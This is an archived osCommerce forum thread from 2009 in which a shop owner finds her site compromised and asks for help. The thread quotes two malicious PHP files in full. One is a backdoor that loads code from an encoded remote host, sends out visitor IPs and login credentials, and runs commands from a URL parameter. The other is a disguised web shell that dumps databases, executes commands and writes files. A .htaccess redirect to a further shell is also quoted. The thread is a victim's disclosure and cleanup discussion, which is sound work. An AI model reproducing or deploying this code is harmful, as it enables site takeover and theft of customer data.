Guest Posted December 7, 2009 Share Posted December 7, 2009 I've spent my weekend trying to clean up my website and get rid of files and old contribs I don't use. Along the way, I discovered two 'interesting' looking files in my catalog>includes>languages folder that didn't look right. Includes.php was one. Never heard of such a file. I looked at it and realized something was wrong. Mind you, my website is humming along just fine. Looks great, no error messages, getting sales, nothing appears to be wrong. This is the content of that includes.php file: <?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);} if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?> Panicked. Wrote to the webhost. They scanned my entire site and found about 50 more just like it...everywhere from the images folder to you name it. Strange looking .htaccess files were also created. I've been deleting files all night. My question is: how does someone access the site to do that? And...why? Can someone decode the above file and explain what the point was? According to the webhost...they've been there since April. I am mortified. I've changed my password to Cpanel. It was a tough one, too. Upper case, lower case, numbers. Struggling to figure out how to change my Admin username and password...any help would be appreciated on that front! Lastly, what can I do...aside from changing passwords...to prevent this in the future? I already have Sitemonitor installed. Must admit...I never used it much. I will run it like clockwork now. I have IP Trap installed. Anything else? I'm running version 2.2. - Andrea Link to comment Share on other sites More sharing options...
Jack_mcs Posted December 7, 2009 Share Posted December 7, 2009 With that many files changed, it was probably done via the recently found security hole with the filemanager. That and other fixes can be found in these threads. If they did use that method of getting in, or maybe even if they didn't, they probably inserted some code that your searches may not find. If you decode the hacker code, as described in some of the above threads, you can determine what files they are using. Or, you can run the hacker test in SiteMonitor. It might be more work but it will find them. In the least, you need to delete the admin/file_manager.php file. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
Guest Posted December 7, 2009 Share Posted December 7, 2009 Hi Jack, Thank You for replying. I installed Sitemonitor 1.8 a while back. Upgraded to 1.9 while waiting to hear back from the webhost. You mention running 'the hacker test' in Sitemonitor. I've deleted all the files my webhost found when they scanned my site, but the hacker test came up with this list: admin/htmlarea/editor_advanced.js admin/htmlarea/editor_basic.js admin/htmlarea/popups/insert_image.html boards/includes/usercp_confirm.php boards/templates/subSilver/posting_topic_review.tpl images/table_background_info.php includes/modules/payment/paypal_ipn.php I've looked at images/table_background_info.php and this is what I get: <?php /* $Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2003 osCommerce Released under the GNU General Public License */ define("OSCOMMERCE_FILENAME", 'shell.php'); define("SLASH", chr(92)); define("NL", chr(10)); define("CRNL", chr(13).chr(10)); $licence = "SBZRRRO7"; if (!isset($_POST['K']) || $licence != $_POST['K']) { header("Status: 404 Not Found"); header("HTTP/1.0 404 Not Found"); $in = rand(10000000, 99999999); $fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2); if ($fp) { $name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']); $out = "GET ".$name." HTTP/1.1".CRNL; $out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL; $out .= "Connection: Close".CRNL.CRNL; fwrite($fp, $out); while (!feof($fp)) { $data2save .= fgets($fp, 128); } @fclose($fp); if (strstr($data2save, CRNL.CRNL)) { $data2save = substr(strstr($data2save, CRNL.CRNL), 4); $data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save); echo preg_replace("~^[\d\s]+$~mi", "", $data2save); } } die(); } header("Expires: Mon, 26 Jul 1980 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Cache-Control: private"); header("Pragma: no-cache"); set_time_limit(99999999999); ini_set('memory_limit', -1); clearstatcache(); function dbc() { if (is_file("../includes/configure.php")) { @include ("../includes/configure.php"); } else if (is_file("includes/configure.php")) { @include ("includes/configure.php"); } if (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER; if (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME; if (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD; if (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE; $MYL = mysql_connect($MYH, $MYU, $MYP); mysql_select_db($MYD); return array($MYL, $MYH, $MYU, $MYP, $MYD); } if (isset($_POST['P'])) { die("A11"); } else if (isset($_POST['MYST'])) { list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc(); $tables = ""; $res = mysql_query("SHOW TABLES"); while ($row = mysql_fetch_array($res)) { $resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL); $rowCounts = @mysql_fetch_array($resCounts); $tables .= "|:|".$row[0].":".$rowCounts[0].NL; } echo $tables; mysql_close($MYL); die("#done"); } else if (isset($_POST['MYSD'])) { list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc(); $list = ""; $res = mysql_query("SHOW DATABASES"); while ($row = mysql_fetch_array($res)) { $list .= "|:|".$row[0].NL; } echo $list; mysql_close($MYL); die("#done"); } else if (isset($_POST['MYFR'])) { list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc(); if (substr($_POST['MYC'], 0, 1) == 0) { $res = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL); $row = @mysql_fetch_array($res); echo $row[1].";".NL; } $res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL); if (@mysql_num_rows($res) > 0) { while (($row = @mysql_fetch_array($res))) { $keys = @implode("`, `", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = mysql_escape_string($v); } $values = @implode("', '", $values); echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL; } } mysql_close($MYL); die("#done"); } else if (isset($_POST['MYINF'])) { $inf = dbc(); unset($inf[0]); die(implode("|:|", $inf)); } else if (isset($_POST['E'])) { @exec($_POST['E'], $output, $retCode); die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output)); } else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])) { if (strlen($_POST['U']) == $_POST['US']) { ignore_user_abort(true); $fpSave = fopen($_POST['UF'], "w"); fwrite($fpSave, base64_decode($_POST['U'])); fclose($fpSave); ignore_user_abort(false); } } if (isset($_POST['T']) || isset($_POST['UF'])) { if (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T']; $t = array(); $d = dir("."); $mt = 0; while (false !== ($e = $d->read())) { $nt = filemtime($e); if ($nt > $mt) $mt = $nt; if (preg_match("~table_background~", $e)) { $t[0][] = $nt; } else { $t[1][] = $nt; } } $d->close(); if (count($t[0]) > 0) $tc = 0; else $tc = 1; sort($t[$tc]); if (count($t[$tc]) > 0) { @touch($f, $t[$tc][floor(count($t[$tc]) / 2)]); @touch("./", $mt); } } ?> I'm 'looking' at the the paypal ipn file and don't see anything in particular...which means nothing. What do you think of the file I just posted? I'm unfamiliar with all of them, except the paypal file. - Andrea Link to comment Share on other sites More sharing options...
Jack_mcs Posted December 7, 2009 Share Posted December 7, 2009 It's a hacker file. There shouldn't be any files in the images directory other than image files and maybe a .htaccess file. The boards/includes/usercp_confirm.php is suspect too but that directory isn't standard oscommerce so it's difficult to say. For the others, there's really no way to know for sure if you are not familiar with what to look for other than comparing them with a known good copy. The best approach to a problem like this is to have the host restore the complete shop directory. You can tell from the datestamp on the hacked files when it happened and if they have a backup from before then, just replacing them all will fix all such problems. Tell them to be sure not to restore the database and there shouldn't be any problems. Once the restore is done, no matter how you do it, you should create a complete copy on your computer so there is something to compare against and to restore from if something like this happens again. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
Guest Posted December 7, 2009 Share Posted December 7, 2009 Thanks for all of your help, Jack. I deleted admin/filemanager.php as you suggested. Renamed the Admin folder to something ridiculous and changed the admin/includes/configure file. Changed my password to Cpanel, changed the username and password on my 'admin' folder. All of the hacker files have been deleted. Those entries for the 'boards'...that folder is something I installed ages ago and never used. It was a message forum. So, I just chucked the entire folder. Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in. The hacker also inserted a number of .htaccess files in the folders which contained hacker files. Here's an example of the content of one of them: Options -MultiViews ErrorDocument 404 //catalog/images/gt_interactive/base.php The file base.php, of course, being a hacker file. Counted eleven new .htaccess files. Deleted them all. I'm not going to go the restore route with the webhost as I really don't want to and fear it might create new problems. I'm always messing around with the website, changing things and trying new things. I think I have manually deleted all the hacker files and the hacker test in Sitemonitor is not showing anymore files. Hopefully, all I've done is all that needs to be done. - Andrea Link to comment Share on other sites More sharing options...
Jack_mcs Posted December 7, 2009 Share Posted December 7, 2009 Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in. If they got in using the file_manager.php file, they didn't need a login. It let them bypass it. If they got in some other way, you may never know. In order to know, or at least make an intelligent guess, you would need the server logs, the time they did it and probably their IP. It usually isn't worth the effort unless they were getting in over and over. I think the problem was the file manager and with the changes you made, it should be OK now. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.